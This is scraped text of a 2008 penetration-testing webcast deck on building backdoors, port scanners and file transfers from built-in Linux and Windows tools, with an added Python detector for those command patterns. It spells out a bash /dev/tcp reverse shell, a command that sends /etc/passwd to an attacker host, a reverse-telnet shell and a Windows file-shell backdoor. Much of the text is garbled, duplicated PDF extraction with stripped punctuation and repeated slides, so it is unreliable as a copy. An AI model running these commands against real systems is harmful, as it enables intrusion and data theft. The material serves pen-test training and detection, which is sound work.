Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 10
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows
Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
[Diagram: the protected server sits behind a firewall that blocks incoming connections and runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; the attacker runs nc -l -p [p], types commands there, and they are executed on the protected server.]
Linux Command-Line Reverse Shell Backdoor In Action
[Screenshot]
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file
[Screenshot caption: Port 80 is listening]
Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
Command-Line Port Scanner In Action
[Screenshot]
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
Reverse Telnet Shell in Action
[Screenshot]
Windows
• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings or command output
• See the first webcast in this series for details on how these work… we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
[Screenshot]
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
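Every technique in this webcast, the Linux /dev/tcp redirections and reverse telnet as well as the Windows FTP-client scanner, the wmic telnet-killer loop and the file shell, is spelled out in a process command line, which is what a defender gets to match on. The Python below is an added example, not code from the webcast: it runs a small rule set over constructed command-line records (the kind auditd execve logging or Windows process-creation auditing produces) and names the pattern each line exhibits; the sample lines, rule names and 192.0.2.x addresses are all constructed for the demo.

```python
"""Rule-based spotting of the "Netcat without Netcat" command patterns.

Added example for this page, not code from the webcast. Every sample
command line is constructed; 192.0.2.x are documentation addresses.
"""
import re

# Caveat: bash performs the /dev/tcp redirection itself and execs nothing
# for it, so the Linux rules only fire when the record carries the shell's
# full command line (a bash -c argument, shell history, auditd proctitle).
RULES = [
    # /bin/bash -i > /dev/tcp/IP/PORT 0<&1 2>&1 : stdin/stderr duplicated onto the socket
    ("linux_devtcp_reverse_shell",
     re.compile(r"/dev/tcp/[^\s/]+/\d+.*(0<&1|2>&1)")),
    # any redirection into /dev/tcp (file push, single-port probe)
    ("linux_devtcp_redirect",
     re.compile(r">\s*/dev/tcp/")),
    # while-loop sweep over /dev/tcp with a variable port number
    ("linux_devtcp_port_sweep",
     re.compile(r"while\s*\[.*\].*/dev/tcp/[^\s/]+/\$")),
    # reverse telnet: telnet | shell | telnet
    ("linux_reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*(/bin/)?(ba)?sh\s*\|\s*telnet")),
    # FOR /L counter writing "open IP %i" into a script that ftp -s: executes
    ("windows_ftp_script_port_scan",
     re.compile(r"for\s+/L\s+%\w\s+in\s*\(.*\).*echo\s+open\s+\S+\s+%\w.*ftp\s+-s:", re.I)),
    # infinite FOR /L (1,0,2) loop killing telnet.exe through wmic
    ("windows_telnet_killer_loop",
     re.compile(r'for\s+/L\s+%\w\s+in\s*\(\s*1\s*,\s*0\s*,\s*2\s*\).*'
                r'wmic\s+process\s+where\s+name="?telnet\.exe"?\s+delete', re.I)),
    # file shell: infinite loop reading a command file, cmd /c, append output, del
    ("windows_file_shell",
     re.compile(r'for\s+/L\s+%\w\s+in\s*\(\s*1\s*,\s*0\s*,\s*2\s*\).*'
                r'for\s+/f\s+.*cmd(\.exe)?\s+/c\s+%\w.*>>.*del\s+', re.I)),
    # command output redirected straight into a UNC share path
    ("windows_redirect_to_share",
     re.compile(r">\s*\\\\[^\\\s]+\\[^\\\s]+\\")),
]

# Constructed records: Linux shell command lines first, then Windows ones.
SAMPLE_CMDLINES = [
    "/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1",
    "cat /etc/passwd > /dev/tcp/192.0.2.10/8080",
    "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/192.0.2.20/$port; "
    "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done",
    "telnet 192.0.2.10 8080 | /bin/bash | telnet 192.0.2.10 8081",
    "tar czf /tmp/backup.tgz /etc",                      # benign
    'cmd.exe /c for /L %i in (1,1,1024) do echo open 192.0.2.30 %i > ftp.txt '
    '& echo quit >> ftp.txt & ftp -s:ftp.txt',
    'cmd.exe /c for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete '
    '& ping -n 6 127.0.0.1',
    'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) '
    'do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1',
    r'cmd.exe /c type secrets.txt > \\192.0.2.40\share\secrets.txt',
    'ftp -s:nightly_upload.txt',                         # benign: one scripted run, no loop
]


def classify(cmdline):
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def detect(cmdlines):
    """Return (index, cmdline, matched_rule_names) for each line matching a rule."""
    hits = []
    for idx, line in enumerate(cmdlines):
        names = classify(line)
        if names:
            hits.append((idx, line, names))
    return hits


if __name__ == "__main__":
    for idx, line, names in detect(SAMPLE_CMDLINES):
        print(f"[{idx}] {', '.join(names)}: {line[:70]}")
```

The rules are string-level and will miss rewritten or obfuscated variants; they are meant to show which artifacts each technique leaves in a command-line record, not to be a complete signature set.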
The File Shell In Action
[Screenshot]
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home On-Line: Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
What Can Netcat Do for Us?
• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more…
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
